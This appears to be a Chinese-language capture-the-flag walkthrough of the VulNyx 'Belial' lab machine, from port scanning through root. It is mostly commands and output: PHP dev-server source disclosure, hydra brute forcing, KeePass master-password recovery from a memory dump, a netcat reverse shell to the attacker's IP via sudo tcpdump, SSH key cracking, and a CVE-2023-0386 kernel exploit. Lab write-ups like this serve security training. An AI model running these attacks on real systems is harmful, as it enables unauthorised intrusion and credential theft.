信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.233  08:00:27:0a:19:dd       (Unknown)
192.168.60.254  00:50:56:e1:d8:58       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.951 seconds (131.21 hosts/sec). 4 responded
❯ export ip=192.168.60.233
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.233:22
Open 192.168.60.233:80
Open 192.168.60.233:2121
Open 192.168.60.233:8090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-06 10:39 CST
Initiating ARP Ping Scan at 10:39
Scanning 192.168.60.233 [1 port]
Completed ARP Ping Scan at 10:39, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:39
Completed Parallel DNS resolution of 1 host. at 10:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:39
Scanning 192.168.60.233 [4 ports]
Discovered open port 80/tcp on 192.168.60.233
Discovered open port 22/tcp on 192.168.60.233
Discovered open port 2121/tcp on 192.168.60.233
Discovered open port 8090/tcp on 192.168.60.233
Completed SYN Stealth Scan at 10:39, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.233
Host is up, received arp-response (0.00073s latency).
Scanned at 2025-03-06 10:39:42 CST for 0s

PORT     STATE SERVICE      REASON
22/tcp   open  ssh          syn-ack ttl 64
80/tcp   open  http         syn-ack ttl 64
2121/tcp open  ccproxy-ftp  syn-ack ttl 64
8090/tcp open  opsmessaging syn-ack ttl 63
MAC Address: 08:00:27:0A:19:DD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

发现在2121端口上运行匿名用户登录

存在users.list字典，下载到本地

❯ ftp anonymous@$ip 2121
Connected to 192.168.60.233.
220 Blessed are those of the left-hand path!
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||32145|)
150 Here comes the directory listing.
drwxrwxr-x    2 1001     1001         4096 Jul 14  2023 resources
226 Directory send OK.
ftp> cd resources
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||34705|)
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           18 Jul 14  2023 users.list
226 Directory send OK.
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||30941|)
150 Opening BINARY mode data connection for users.list (18 bytes).
100% |******************************|    18       15.32 KiB/s    00:00 ETA
226 Transfer complete.
18 bytes received in 00:00 (7.51 KiB/s)
ftp> exit
221 Goodbye.

发现新用户kohanic

1
2
3

❯ cat users.list
anonymous
kohanic

同时在8090端口上存在登录表单

但是无论你输入什么都会显示sql报错

尝试利用sqlmap寻找是否有sql注入点，无果

尝试枚举一下8090端口下的目录

❯ gobuster dir -u "http://$ip:8090" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403 --exclude-length 329
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.233:8090
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] Exclude Length:          329
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/info.php             (Status: 200) [Size: 66630]
/secret.php           (Status: 200) [Size: 232]
/validation.php       (Status: 200) [Size: 146]

Progress: 106858 / 1102800 (9.69%)
===============================================================
Finished
===============================================================

模糊测试

发现存在/secret.php

curl一下，注释中存在提示信息

❯ curl http://192.168.60.233:8090/secret.php\? -iv
*   Trying 192.168.60.233:8090...
* Connected to 192.168.60.233 (192.168.60.233) port 8090
* using HTTP/1.x
> GET /secret.php HTTP/1.1
> Host: 192.168.60.233:8090
> User-Agent: curl/8.11.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Host: 192.168.60.233:8090
Host: 192.168.60.233:8090
< Date: Thu, 06 Mar 2025 04:20:03 GMT
Date: Thu, 06 Mar 2025 04:20:03 GMT
< Connection: close
Connection: close
< X-Powered-By: PHP/7.4.21
X-Powered-By: PHP/7.4.21
< Content-type: text/html; charset=UTF-8
Content-type: text/html; charset=UTF-8
<

<html>
<body>
<p>Hello Kohanic,<br>
你好 Kohanic
<br>
If you've made it this far, it's clear that you're already one step away from finding your reward!<br>
如果您已经走到这一步，那么很明显您离找到您的奖励只有一步之遥！
<br>
Yours sincerely,<br>
Gelal</p>
<!-- Remember to identify the correct parameter -->
<!-- 记得识别正确的参数 -->
* shutting down connection #0

我猜测是LFI，尝试模糊测试一下，无果

❯ wfuzz -c -u "http://192.168.60.233:8090/secret.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 35
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.233:8090/secret.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================


Total time: 391.3108
Processed Requests: 207643
Filtered Requests: 207643
Requests/sec.: 530.6344

这里就卡住就不会了，看了一下WP

PHP源代码泄露

发现X-Powered-By: PHP/7.4.21这里的php版本有点低，而且存在漏洞

可以利用PHP 开发服务器 <= 7.4.21 - 远程源代码泄漏 — ProjectDiscovery 博客

源代码泄露

需要取消勾选Update Content-Length

通过此POC得到网页源代码

GET /secret.php HTTP/1.1
Host: 192.168.60.233:8090

GET /x.x HTTP/1.1

得到参数fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739

是够长的，说白了就是不想让你枚举出来

如果传入了正确的参数就尝试读取/root/secret.txt

Ftp字典爆破

我们再次curl一下，又给了一点提示

❯ curl http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
<html>
<body>
<p>Hello Kohanic,<br>
<br>
If you've made it this far, it's clear that you're already one step away from finding your reward!<br>
<br>
Yours sincerely,<br>
Gelal</p>
<!-- Remember to identify the correct parameter -->
Fugitive, witch-doctor, born in an impoverished stable
Could this flimsy child truly be the predicted scepter?

Balaam’s prophecy, Judah’s predictions
Artificial pages of an unearthly fetish
Interpreter of the Torah
Worshipped by the Magi of Arabia

Hobo of Aramaic Tongues
逃亡者，巫医，在一个贫穷的马厩出生
这个脆弱的孩子真的能成为被预言的权杖吗？

巴兰的预言，犹大的预测
来自超凡神秘偶像的人造页面
托拉解释者
阿拉伯魔术师崇拜着

亚美尼亚语方言流浪汉
</body>
</html>

这好像是个故事之类的，尝试利用cewl根据文本生成字典

1
2

❯ cewl -w dic.txt http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
CeWL 6.2.1 (More Fixes) Robin Wood ([email protected]) (https://digi.ninja/)

利用这个字典尝试爆破一下ftp

竟然还是没有

❯ hydra -l kohanic -P dic.txt ftp://$ip:2121 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 12:46:50
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 52 login tries (l:1/p:52), ~4 tries per task
[DATA] attacking ftp://192.168.60.233:2121/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-06 12:47:06

尝试利用cewler再次生成字典

roys/cewler： CeWLeR - 重新定义自定义单词列表生成器。Python 中的 CeWL 替代方案，基于 Scrapy 框架。

得到ftp凭证kohanic:witch-doctor

❯ cewler -o dic2.txt http://192.168.60.233:8090/secret.php\?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739
/home/Pepster/.pyenv/versions/3.9.10/lib/python3.9/site-packages/pypdf/_crypt_providers/_cryptography.py:32: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  from cryptography.hazmat.primitives.ciphers.algorithms import AES, ARC4


2025-03-06 12:45:44 [py.warnings] WARNING: /home/Pepster/.pyenv/versions/3.9.10/lib/python3.9/site-packages/scrapy/selector/unified.py:83: UserWarning: Selector got
both text and root, root is being ignored.
  super().__init__(text=text, type=st, root=root, **kwargs)

╭────────────────────────────────── CeWLeR v.1.2.0 - Custom Word List generator Redefined ──────────────────────────────────╮
│                                                                                                                           │
│   URL:           http://192.168.60.233:8090/secret.php?fbd94d1aa64007cbb89b9c0156ac23edba23f7fd57b2d765e4e88712ee642739   │
│   Strategy:      Exact same domain, max depth 2, 20 reqs/s                                                                │
│   Words:         Mixed case, incl. numbers, min. 5 chars.                                                                 │
│   User-Agent:    Default (Mozilla/5.0 (Macintosh; Intel Mac OS...)                                                        │
│   Output:        dic2.txt                                                                                                 │
│   Time elapsed:  00:00                                                                                                    │
│   Requests:      1/1                                                                                                      │
│   Data received: 675.0 B                                                                                                  │
│   Words found:   39                                                                                                       │
│                                                                                                                           │
╰───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

❯ hydra -l kohanic -P dic2.txt ftp://$ip:2121 -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-06 12:47:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 39 login tries (l:1/p:39), ~3 tries per task
[DATA] attacking ftp://192.168.60.233:2121/
[2121][ftp] host: 192.168.60.233   login: kohanic   password: witch-doctor
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-06 12:47:22

ftp连接一下，存在keepass密码本

同时还存在ssh私钥文件

下载到本地，john爆破一下

❯ ftp kohanic@$ip 2121
Connected to 192.168.60.233.
220 Blessed are those of the left-hand path!
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||33010|)
150 Here comes the directory listing.
drwxrwxr-x    2 1001     1001         4096 Jul 17  2023 DB
226 Directory send OK.
ftp> cd DB
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||20365|)
150 Here comes the directory listing.
-rw-rw-r--    1 1001     1001         4110 Jul 17  2023 Database.kdbx
-rw-rw-r--    1 1001     1001     304893561 Jul 17  2023 KeePass.DMP
226 Directory send OK.
ftp> get Database.kdbx
local: Database.kdbx remote: Database.kdbx
229 Entering Extended Passive Mode (|||45513|)
150 Opening BINARY mode data connection for Database.kdbx (4110 bytes).
100% |***********************************************************************************************************************|  4110        1.75 MiB/s    00:00 ETA
226 Transfer complete.
4110 bytes received in 00:00 (1.07 MiB/s)
ftp> get KeePass.DMP
local: KeePass.DMP remote: KeePass.DMP
229 Entering Extended Passive Mode (|||62389|)
150 Opening BINARY mode data connection for KeePass.DMP (304893561 bytes).
100% |***********************************************************************************************************************|   290 MiB   47.41 MiB/s    00:00 ETA
226 Transfer complete.
304893561 bytes received in 00:06 (47.40 MiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||28919|)
150 Here comes the directory listing.
drwxr-x---    6 1001     1001         4096 Jul 19  2023 .
drwxr-xr-x    4 0        0            4096 Jul 14  2023 ..
lrwxrwxrwx    1 1001     1001            9 Jul 17  2023 .bash_history -> /dev/null
-rw-r--r--    1 1001     1001          220 Oct 07  2022 .bash_logout
-rw-r--r--    1 1001     1001         3771 Oct 07  2022 .bashrc
drwx------    2 1001     1001         4096 Jul 14  2023 .cache
drwxrwxr-x    3 1001     1001         4096 Jul 14  2023 .local
-rw-r--r--    1 1001     1001          807 Oct 07  2022 .profile
drwx------    2 1001     1001         4096 Jul 17  2023 .ssh
-rw-rw-r--    1 1001     1001          215 Jul 18  2023 .wget-hsts
drwxrwxr-x    2 1001     1001         4096 Jul 17  2023 DB
226 Directory send OK.
ftp> cd .ssh
250 Directory successfully changed.
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||31102|)
150 Here comes the directory listing.
drwx------    2 1001     1001         4096 Jul 17  2023 .
drwxr-x---    6 1001     1001         4096 Jul 19  2023 ..
-rw-r--r--    1 1001     1001          568 Jul 17  2023 authorized_keys
-rw-------    1 1001     1001         2655 Jul 17  2023 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||19108|)
150 Opening BINARY mode data connection for id_rsa (2655 bytes).
100% |***********************************************************************************************************************|  2655        1.34 MiB/s    00:00 ETA
226 Transfer complete.
2655 bytes received in 00:00 (725.45 KiB/s)
ftp>

ftp> exit
221 Goodbye.

然而无论是kdbx文件还是私钥文件都爆不出来

Dump转储利用

那猜测可能是利用KeePass.DMP这个转储文件

1 2	❯ file KeePass.DMP KeePass.DMP: Mini DuMP crash report, 16 streams, Mon Jul 17 13:53:40 2023, 0x421826 type

CVE-2023-32784在 2.54 之前的 KeePass 2.x 中，即使工作区被锁定或不再运行，也可以从内存转储中恢复明文主密码

Orange-Cyberdefense/KeePwn：一种用于自动化 KeePass 发现和秘密提取的 python 工具。

通过DMP内存中检索数据库的主密码

等待了一会，得到Keepass密码SuP3r-S#cR3+213!

❯ python3 KeePwn.py parse_dump -d ../KeePass.DMP --bruteforce Database.kdbx

[*] Searching for the master password in memory dump.. done!
[*] Found 16 candidates:
     ＿ËP3r-S#cR3+213!
     ＿uP3r-S#cR3+213!
     ＿CP3r-S#cR3+213!
     ＿§P3r-S#cR3+213!
     ＿AP3r-S#cR3+213!
     ＿)P3r-S#cR3+213!
     ＿P3r-S#cR3+213!
     ＿P3r-S#cR3+213!
     ＿HP3r-S#cR3+213!
     ＿P3r-S#cR3+213!
     ＿oP3r-S#cR3+213!
     ＿ P3r-S#cR3+213!
     ＿,P3r-S#cR3+213!
     ＿LP3r-S#cR3+213!
     ＿7P3r-S#cR3+213!
     ＿%P3r-S#cR3+213!

[*] Bruteforcing missing symbol with the 254 most common unicode characters.. done!
[+] Database.kdbx successfully unlocked using master password SuP3r-S#cR3+213!

尝试打开一下，得到一个新的凭证FYIo$KL%waFs

❯ kpcli --kdb=Database.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> dir
=== Groups ===
Database/
kpcli:/> cd Database/
kpcli:/Database> ls
=== Groups ===
General/
kpcli:/Database> cd General/
kpcli:/Database/General> ls
=== Entries ===
0. belial                                         ssh://{USERNAME}@{TITLE}
kpcli:/Database/General> show belial -f

 Path: /Database/General/
Title: belial
Uname: kohanic
 Pass: FYIo$KL%waFs
  URL: ssh://{USERNAME}@{TITLE}
Notes:
Atchm: id_rsa (2655 bytes)

用户提权

猜测可能是私钥密码，尝试ssh连接一下

啊，咋没有user flag

不过用户拥有sudo权限

❯ ssh kohanic@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
kohanic@belial:~$ ls -al
total 40
drwxr-x--- 6 kohanic kohanic 4096 Jul 19  2023 .
drwxr-xr-x 4 root    root    4096 Jul 14  2023 ..
lrwxrwxrwx 1 kohanic kohanic    9 Jul 17  2023 .bash_history -> /dev/null
-rw-r--r-- 1 kohanic kohanic  220 Oct  7  2022 .bash_logout
-rw-r--r-- 1 kohanic kohanic 3771 Oct  7  2022 .bashrc
drwx------ 2 kohanic kohanic 4096 Jul 14  2023 .cache
drwxrwxr-x 2 kohanic kohanic 4096 Jul 17  2023 DB
drwxrwxr-x 3 kohanic kohanic 4096 Jul 14  2023 .local
-rw-r--r-- 1 kohanic kohanic  807 Oct  7  2022 .profile
drwx------ 2 kohanic kohanic 4096 Jul 17  2023 .ssh
-rw-rw-r-- 1 kohanic kohanic  215 Jul 18  2023 .wget-hsts
kohanic@belial:~$ sudo -l
Matching Defaults entries for kohanic on belial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User kohanic may run the following commands on belial:
    (root) NOPASSWD: /usr/bin/tcpdump

尝试利用tcpdump提权

发现命令并不起效

kohanic@belial:~$ echo "nc -e /bin/bash 192.168.60.100 4444">aa
kohanic@belial:~$ chmod +x aa
kohanic@belial:~$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z aa -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
24 packets received by filter
0 packets dropped by kernel

本地端口开放

查看一下本地开放端口

发现存在65533端口开放

用户gelal 在执行家目录中的/c2/start.sh脚本

kohanic@belial:~$ ss -luntp
Netid          State           Recv-Q          Send-Q                           Local Address:Port                      Peer Address:Port          Process
udp            UNCONN          0               0                                   127.0.0.54:53                             0.0.0.0:*
udp            UNCONN          0               0                                127.0.0.53%lo:53                             0.0.0.0:*
udp            UNCONN          0               0                        192.168.60.233%enp0s3:68                             0.0.0.0:*
tcp            LISTEN          0               4096                             127.0.0.53%lo:53                             0.0.0.0:*
tcp            LISTEN          0               4096                                   0.0.0.0:8090                           0.0.0.0:*
tcp            LISTEN          0               4096                                 127.0.0.1:65533                          0.0.0.0:*
tcp            LISTEN          0               4096                                127.0.0.54:53                             0.0.0.0:*
tcp            LISTEN          0               4096                                 127.0.0.1:43681                          0.0.0.0:*
tcp            LISTEN          0               511                                          *:80                                   *:*
tcp            LISTEN          0               32                                           *:2121                                 *:*
tcp            LISTEN          0               4096                                         *:22                                   *:*
kohanic@belial:~$ ps aux |grep gelal
gelal        728  0.0  0.0   2736   964 ?        Ss   02:38   0:00 /bin/sh -c bash /home/gelal/c2/start.sh
gelal        730  0.0  0.0   2736   960 ?        Ss   02:38   0:00 /bin/sh -c cd /home/gelal/c2/; php -S 127.0.0.1:65533
gelal        738  0.0  0.0   7356  3680 ?        S    02:38   0:01 bash /home/gelal/c2/start.sh
gelal        753  0.0  0.4 200432 18844 ?        S    02:38   0:01 php -S 127.0.0.1:65533
gelal      12560  0.0  0.0   5616  1016 ?        S    08:19   0:00 sleep 5

我传个pspy上去监测一下系统进程

2025/03/06 08:24:49 CMD: UID=1002  PID=12713  | curl -si -X POST http://127.0.0.1:65533/fd98ca2e839e212 -A Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Brave/74 -H Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2wiOiJzdXBlcmFkbWluIiwibmFtZSI6ImdlbGFsIiwicGFzc3dvcmQiOiJQJHNzdzByZCEzMjEifQ.nujWki5QiuGCqjur_VfBCtvmKk_XGhW7FPrx_dZzOYI -d 45 45 45 45 45 66 69 74 69 68 10 68 69 75 45 73 110 102 111 58 32 68 69 83 45 69 68 69 51 45 67 66 67 44 66 48 66 69 69 ………………省略………………

发现Authorization存在疑似base64编码

CyberChef解码一下，发现是JWT编码

里面包含了用户凭证gelal:P$ssw0rd!321

后面紧跟的-d数据是ASCII编码

不过根据pspy捕捉到的好像只有一半的数据

这时候我们就可以利用tcpdump抓一下包了

kohanic@belial:/tmp$ sudo tcpdump -i lo -A
POST /fd98ca2e839e212 HTTP/1.1
Host: 127.0.0.1:65533
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Brave/74
Accept: */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2wiOiJzdXBlcmFkbWluIiwibmFtZSI6ImdlbGFsIiwicGFzc3dvcmQiOiJQJHNzdzByZCEzMjEifQ.nujWki5QiuGCqjur_VfBCtvmKk_XGhW7FPrx_dZzOYI
Content-Length: 11044
Content-Type: application/x-www-form-urlencoded

45 45 45 45 45 66 69 71 73 78 32 82 83 65 32 80 82 73 86 65 84 69 32 75 69 89 45 45 45 45 45 10 80 114 …………省略………………

再次解码一下

得到私钥内容

爆破一下，得到私钥密码elizabeth1

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
elizabeth1       (id_rsa)
1g 0:00:00:00 DONE (2025-03-06 16:50) 100.0g/s 121600p/s 121600c/s 121600C/s gilbert..buttons
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

连接一下ssh，终于拿到user了

通过上面的凭证是无法登录的，猜测是其他的密码

通过查看.viminfo得知vim编辑的历史信息

❯ ssh gelal@$ip -i id_rsa
Enter passphrase for key 'id_rsa':
gelal@belial:~$ cat user.txt
VulNyx{3a96ac54dadf2aa5c3ebb59cbb80c191}
gelal@belial:~$ sudo -l
[sudo] password for gelal:
Sorry, try again.
[sudo] password for gelal:
sudo: 1 incorrect password attempt
gelal@belial:~$ cat .viminfo
# This viminfo file was generated by Vim 9.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:q
|2,0,1689597929,,"q"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  ~/.cache/2/0/2/3/_/0/3/8/6/twj.zip
|4,48,1,0,1689597929,"~/.cache/2/0/2/3/_/0/3/8/6/twj.zip"

# Jumplist (newest first):
-'  1  0  ~/.cache/2/0/2/3/_/0/3/8/6/twj.zip
|4,39,1,0,1689597929,"~/.cache/2/0/2/3/_/0/3/8/6/twj.zip"

# History of marks within files (newest to oldest):

发现最近编辑了~/.cache/2/0/2/3/_/0/3/8/6/twj.zip这个文件

scp拷贝到本地，发现压缩包需要密码尝试利用上面获取的P$ssw0rd!321

❯ scp -i vulnyx/id_rsa gelal@$ip:~/.cache/2/0/2/3/_/0/3/8/6/twj.zip vulnyx
Enter passphrase for key 'vulnyx/id_rsa':
twj.zip      
❯ x twj.zip
extract: extracting to twj
Archive:  /home/Pepster/vulnyx/twj.zip
[/home/Pepster/vulnyx/twj.zip] Urgent.msg password:
  inflating: Urgent.msg

内核提权

通过file查看得知是个pdf文件

1
2
3

❯ file Urgent.msg
Urgent.msg: PDF document, version 1.6, 1 page(s)
❯ mv Urgent.msg Urgent.pdf

浏览器打开看一下

给了一个提示内核漏洞以及一些库文件

gelal@belial:~$ find / -name libfuse-dev 2>/dev/null
/usr/share/doc/libfuse-dev
gelal@belial:~$ find / -name libcap-dev 2>/dev/null
/usr/share/doc/libcap-dev

通过关键字搜索

CVE-2023-0386 overlayfs 中的 Linux 内核漏洞 - vsociety

xkaneiki/CVE-2023-0386: CVE-2023-0386在ubuntu22.04上的提权

sxlmnwb/CVE-2023-0386: Vulnerabilities Exploitation On Ubuntu 22.04

security-labs-pocs/proof-of-concept-exploits/overlayfs-cve-2023-0386 at 主 ·DataDog/security-labs-pocs

编译报错了，需要在fuse.c代码中修改一下

你可以在 #include <errno.h> 之后添加：

1
2
3

#include <unistd.h>  // read(), close(), rmdir()
#include <fcntl.h>   // open()
#include <sys/stat.h> // mkdir()

修正 printf 类型格式：

1 2	printf("offset %ld\n", (long)off); printf("size %zu\n", size);

不使用make all，使用动态链接编译

再次尝试编译一下

gelal@belial:/tmp/CVE-2023-0386$ vi fuse.c
gelal@belial:/tmp/CVE-2023-0386$ gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -pthread -lfuse -ldl
gelal@belial:/tmp/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ed8
[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601

再开一个终端，执行exp即可

gelal@belial:/tmp/CVE-2023-0386$ ./exp
uid:1002 gid:1002
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Mar  6 09:38 .
drwxrwxr-x 6 root   root     4096 Mar  6 09:38 ..
-rwsrwxrwx 1 nobody nogroup 16088 Jan  1  1970 file
[+] exploit success!
root@belial:/tmp/CVE-2023-0386# id
uid=0(root) gid=0(root) groups=0(root),1002(gelal)
root@belial:/tmp/CVE-2023-0386# cat /root/root.txt
VulNyx{7f2d71a3a6c9e3e42aa2443c1026dd9c}